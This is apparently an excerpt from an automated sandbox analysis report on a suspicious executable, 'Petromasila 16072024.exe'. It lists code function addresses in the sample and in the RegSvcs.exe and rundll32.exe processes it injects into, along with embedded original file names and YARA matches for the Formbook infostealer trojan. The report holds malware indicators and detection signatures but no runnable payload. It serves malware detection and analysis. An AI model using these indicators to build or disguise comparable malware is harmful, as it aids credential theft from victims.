Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D44C8	0_2_024D44C8
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D44D8	0_2_024D44D8
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A6950	0_2_063A6950
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A2220	0_2_063A2220
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A2213	0_2_063A2213
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A2655	0_2_063A2655
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A2A90	0_2_063A2A90
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A42E0	0_2_063A42E0
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A6950	0_2_063A6950
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A6940	0_2_063A6940
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_063A4DA7	0_2_063A4DA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00402160	4_2_00402160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00401170	4_2_00401170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004169DE	4_2_004169DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004169E3	4_2_004169E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041699C	4_2_0041699C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004022E0	4_2_004022E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040FC53	4_2_0040FC53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042E4B3	4_2_0042E4B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00402540	4_2_00402540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040FE73	4_2_0040FE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040DEEA	4_2_0040DEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040DEF3	4_2_0040DEF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00402F10	4_2_00402F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AD130	4_2_013AD130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D010E	4_2_013D010E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0135717A	4_2_0135717A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013151C0	4_2_013151C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BE076	4_2_013BE076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013000A0	4_2_013000A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0134508C	4_2_0134508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C70F1	4_2_013C70F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131B0D0	4_2_0131B0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CF330	4_2_013CF330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131E310	4_2_0131E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301380	4_2_01301380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C124C	4_2_013C124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FD2EC	4_2_012FD2EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DA526	4_2_013DA526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CF5C9	4_2_013CF5C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C75C6	4_2_013C75C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310445	4_2_01310445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137D480	4_2_0137D480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01312760	4_2_01312760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131A760	4_2_0131A760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C6757	4_2_013C6757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AD62C	4_2_013AD62C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01334670	4_2_01334670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BD646	4_2_013BD646
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310680	4_2_01310680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CF6F6	4_2_013CF6F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130C6E0	4_2_0130C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013836EC	4_2_013836EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CA6C0	4_2_013CA6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130E9A0	4_2_0130E9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CE9A6	4_2_013CE9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013559C0	4_2_013559C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013B0835	4_2_013B0835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E810	4_2_0133E810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01313800	4_2_01313800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01319870	4_2_01319870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B870	4_2_0132B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F6868	4_2_012F6868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01385870	4_2_01385870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CF872	4_2_013CF872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013898B2	4_2_013898B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01326882	4_2_01326882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C78F3	4_2_013C78F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C18DA	4_2_013C18DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013128C0	4_2_013128C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CFB2E	4_2_013CFB2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310B10	4_2_01310B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0134DB19	4_2_0134DB19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01384BC0	4_2_01384BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CCA13	4_2_013CCA13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CEA5B	4_2_013CEA5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132FAA0	4_2_0132FAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CFA89	4_2_013CFA89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CFD27	4_2_013CFD27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130AD00	4_2_0130AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01310D69	4_2_01310D69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C7D4C	4_2_013C7D4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01322DB0	4_2_01322DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AFDF4	4_2_013AFDF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01319DD0	4_2_01319DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131AC20	4_2_0131AC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01300C12	4_2_01300C12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01313C60	4_2_01313C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C6C69	4_2_013C6C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CEC60	4_2_013CEC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BEC4C	4_2_013BEC4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013A9C98	4_2_013A9C98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01397CE8	4_2_01397CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132FCE0	4_2_0132FCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013DACEB	4_2_013DACEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01328CDF	4_2_01328CDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131CF00	4_2_0131CF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CFF63	4_2_013CFF63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013CEFBF	4_2_013CEFBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01316FE0	4_2_01316FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C1FC6	4_2_013C1FC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013B0E6D	4_2_013B0E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01330E50	4_2_01330E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01352E48	4_2_01352E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01311EB2	4_2_01311EB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C0EAD	4_2_013C0EAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01302EE8	4_2_01302EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C9ED2	4_2_013C9ED2
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_03248219	5_2_03248219
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_03248227	5_2_03248227
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_0324A1E3	5_2_0324A1E3
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_03268823	5_2_03268823
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_03249FC3	5_2_03249FC3
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_03250D0C	5_2_03250D0C
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_03250D4E	5_2_03250D4E
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Code function: 5_2_03250D53	5_2_03250D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D4D480	6_2_04D4D480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE0445	6_2_04CE0445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9F5C9	6_2_04D9F5C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D975C6	6_2_04D975C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04DAA526	6_2_04DAA526
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9A6C0	6_2_04D9A6C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CDC6E0	6_2_04CDC6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9F6F6	6_2_04D9F6F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D536EC	6_2_04D536EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE0680	6_2_04CE0680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D8D646	6_2_04D8D646
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D04670	6_2_04D04670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D7D62C	6_2_04D7D62C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D96757	6_2_04D96757
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE2760	6_2_04CE2760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CEA760	6_2_04CEA760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CEB0D0	6_2_04CEB0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D970F1	6_2_04D970F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D1508C	6_2_04D1508C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CD00A0	6_2_04CD00A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D8E076	6_2_04D8E076
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE51C0	6_2_04CE51C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CFB1E0	6_2_04CFB1E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D2717A	6_2_04D2717A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04DA010E	6_2_04DA010E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CCF113	6_2_04CCF113
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D7D130	6_2_04D7D130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CCD2EC	6_2_04CCD2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9124C	6_2_04D9124C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CD1380	6_2_04CD1380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CEE310	6_2_04CEE310
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9F330	6_2_04D9F330
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CF8CDF	6_2_04CF8CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CFFCE0	6_2_04CFFCE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04DAACEB	6_2_04DAACEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D79C98	6_2_04D79C98
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D8EC4C	6_2_04D8EC4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE3C60	6_2_04CE3C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D96C69	6_2_04D96C69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9EC60	6_2_04D9EC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CD0C12	6_2_04CD0C12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CEAC20	6_2_04CEAC20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE9DD0	6_2_04CE9DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D7FDF4	6_2_04D7FDF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CF2DB0	6_2_04CF2DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D97D4C	6_2_04D97D4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE0D69	6_2_04CE0D69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CDAD00	6_2_04CDAD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9FD27	6_2_04D9FD27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D99ED2	6_2_04D99ED2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CD2EE8	6_2_04CD2EE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D90EAD	6_2_04D90EAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE1EB2	6_2_04CE1EB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D00E50	6_2_04D00E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D22E48	6_2_04D22E48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D80E6D	6_2_04D80E6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D91FC6	6_2_04D91FC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE6FE0	6_2_04CE6FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9EFBF	6_2_04D9EFBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9FF63	6_2_04D9FF63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CECF00	6_2_04CECF00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D918DA	6_2_04D918DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE28C0	6_2_04CE28C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D978F3	6_2_04D978F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CF6882	6_2_04CF6882
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D598B2	6_2_04D598B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CC6868	6_2_04CC6868
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9F872	6_2_04D9F872
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE9870	6_2_04CE9870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CFB870	6_2_04CFB870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D0E810	6_2_04D0E810
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE3800	6_2_04CE3800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D80835	6_2_04D80835
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D259C0	6_2_04D259C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CDE9A0	6_2_04CDE9A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9E9A6	6_2_04D9E9A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9FA89	6_2_04D9FA89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CFFAA0	6_2_04CFFAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9EA5B	6_2_04D9EA5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9CA13	6_2_04D9CA13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D54BC0	6_2_04D54BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D1DB19	6_2_04D1DB19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04CE0B10	6_2_04CE0B10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D9FB2E	6_2_04D9FB2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B51BD0	6_2_02B51BD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B6B320	6_2_02B6B320
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B4CAC0	6_2_02B4CAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B53809	6_2_02B53809
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B53850	6_2_02B53850
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B5384B	6_2_02B5384B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B4CCE0	6_2_02B4CCE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B4AD60	6_2_02B4AD60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B4AD57	6_2_02B4AD57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04BBE474	6_2_04BBE474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04BBE354	6_2_04BBE354
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04BBD878	6_2_04BBD878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04BBCAAF	6_2_04BBCAAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04BBCB08	6_2_04BBCB08

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01357BE4 appears 96 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0138EF10 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 012FB910 appears 267 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01345050 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0137E692 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04D5EF10 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04D15050 appears 36 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04D27BE4 appears 89 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04CCB910 appears 267 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04D4E692 appears 86 times

Source: Petromasila 16072024.exe, 00000000.00000002.67398967466.0000000006B50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs Petromasila 16072024.exe
Source: Petromasila 16072024.exe, 00000000.00000000.67286295784.0000000000276000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRWGN.exe4 vs Petromasila 16072024.exe
Source: Petromasila 16072024.exe, 00000000.00000002.67394861728.00000000026B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs Petromasila 16072024.exe
Source: Petromasila 16072024.exe, 00000000.00000002.67398235316.0000000006300000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Petromasila 16072024.exe
Source: Petromasila 16072024.exe, 00000000.00000002.67395529159.000000000388E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Petromasila 16072024.exe
Source: Petromasila 16072024.exe, 00000000.00000002.67393367490.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Petromasila 16072024.exe
Source: Petromasila 16072024.exe	Binary or memory string: OriginalFilenameRWGN.exe4 vs Petromasila 16072024.exe

Source: Petromasila 16072024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
